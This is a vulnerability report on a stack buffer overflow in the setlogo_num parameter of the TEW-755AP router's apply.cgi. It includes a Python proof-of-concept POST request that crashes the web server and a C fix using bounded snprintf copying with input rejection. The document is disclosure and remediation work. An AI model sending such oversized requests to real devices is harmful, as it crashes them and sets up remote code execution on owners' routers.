We found a stack buffer overflow vulnerability in the **TEW-755AP** (firmware version TEW755AP-FW113B01.bin).


In the handler function for the action icp_setlogo_img (sub_41DBF4) in the file /www/cgi/ssi, the value of setlogo_num is copied directly into a stack buffer without a size check. An attacker can supply a very long string for this parameter in the POST data sent to apply.cgi, overflow the stack buffer, and ultimately achieve Remote Code Execution.

PoC

```python
import requests

url = "http://192.168.17.221:80/apply.cgi"
cookie = {"Cookie": "uid=1234"}
data = {
    'action': "icp_setlogo_img",
    "setlogo_num": "a" * 0x1000
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)
```

We use Python to send a crafted HTTP POST request to the web server and print out the response.


When the crafted HTTP request is sent to the server, it returns a 502 error code. This is because the stack buffer has been overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If the input were malicious shellcode instead, the system would be controlled by the attacker.

Fix Suggestion:

Use snprintf with an explicit size bound (and reject over-long input) instead of the unbounded copy, to avoid the buffer overflow.
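The following is an added illustration of the suggested fix, written for this report; it is not the vendor's ssi code. It assumes a hypothetical 16-byte stack buffer for setlogo_num and that the field is expected to be numeric (neither detail is stated in the report). The unsafe pattern described above is an unbounded copy of the request value into the stack buffer; the hardened handler below bounds the copy with snprintf, uses its return value to detect truncation, and rejects the request instead of writing past the buffer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the stack buffer for setlogo_num (hypothetical, not from the firmware). */
#define SETLOGO_NUM_MAX 16

/* Unsafe pattern the report describes: strcpy(buf, value) with no length check.
 * A request value longer than the buffer then overwrites the stack frame. */

/* Bounded copy. Returns 1 if the whole value fit, 0 if it was rejected as too long.
 * snprintf never writes more than dst_size bytes; its return value is the length
 * the full string would have had, so n >= dst_size means truncation occurred. */
int copy_setlogo_num(char *dst, size_t dst_size, const char *value)
{
    int n = snprintf(dst, dst_size, "%s", value);
    if (n < 0 || (size_t)n >= dst_size) {
        dst[0] = '\0';          /* discard the truncated partial copy */
        return 0;
    }
    return 1;
}

/* Hardened handler for the setlogo_num parameter.
 * Returns an HTTP-style status: 200 when accepted, 400 when rejected. */
int handle_setlogo_img(const char *setlogo_num)
{
    char buf[SETLOGO_NUM_MAX];

    if (setlogo_num == NULL)
        return 400;
    if (!copy_setlogo_num(buf, sizeof buf, setlogo_num))
        return 400;             /* too long: reject instead of overflowing */
    if (buf[0] == '\0')
        return 400;             /* empty value is not a valid logo number */
    for (const char *p = buf; *p; p++) {
        if (*p < '0' || *p > '9')
            return 400;         /* assumed: the field must be numeric */
    }
    return 200;
}

/* Helper that builds a value of n repeated characters (e.g. the 0x1000 'a's
 * from the PoC) and runs it through the handler. */
int handle_repeated(char c, size_t n)
{
    char *value = malloc(n + 1);
    if (value == NULL)
        return 500;
    memset(value, c, n);
    value[n] = '\0';
    int status = handle_setlogo_img(value);
    free(value);
    return status;
}

int main(void)
{
    printf("short numeric value -> %d\n", handle_setlogo_img("3"));
    printf("0x1000 'a' bytes    -> %d\n", handle_repeated('a', 0x1000));
    return 0;
}
```

The key point is checking snprintf's return value: bounding the write alone stops the overflow, but silently truncating a request parameter can still leave the handler operating on a value the client never sent, so the handler rejects anything that did not fit.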